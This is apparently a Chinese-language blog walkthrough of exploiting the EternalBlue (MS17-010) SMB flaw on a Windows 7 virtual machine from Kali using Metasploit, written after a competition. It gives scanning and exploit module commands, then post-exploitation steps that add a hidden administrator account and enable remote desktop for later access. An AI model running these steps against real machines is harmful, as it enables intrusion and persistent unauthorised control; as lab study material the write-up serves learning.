永恆之藍(445端口)完整利用過程
前幾天有一次比賽的時候接觸到了永恆之藍漏洞,之前也沒復現過永恆之藍漏洞,在查資料方面花費了很多時間,就想着寫篇博客記錄一下。
前置環境:
kali,win7虛擬機,msf(kali自帶)
一 · 掃描網絡中存活主機
使用命令:
netdiscover -i eth0 -r 192.168.1.1/24

PS:由於這里使用的是虛擬機,所以網卡顯示為 VMware
二 · 掃描當前主機存活端口
使用命令:
nmap -sV -n 192.168.1.1

三 · 開啟MSF並利用搜索並檢測是否能利用永恆之藍
開啟MSF:
msfconsole

檢測永恆之藍是否能利用 :
search ms17-010

use auxiliary/scanner/smb/smb_ms17_010

set RHOST 192.168.1.2

經過檢測可以發現永恆之藍漏洞可以利用

四 · 利用永恆之藍漏洞
use exploit/windows/smb/ms17_010_eternalblue

剩下的命令不再做文本解釋


成功獲得shell

=================================================================
so,獲得shell之后應該做什么呢???
新建一個用戶,以便下次訪問。並將該用戶升為管理員權限,這樣就可以擁有更大的權限了
新建用戶並添加到管理員中
net user taotao 123 /add
net localgroup administrators taotao /add
查看是否成功操作
net user 查看本地用戶列表
net localgroup administrators
但是光有shell權限太不方便了,再開啟一個3389方便遠程連接
遠程連接之前需要判斷對方用戶在不在線
開啟遠程桌面服務
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
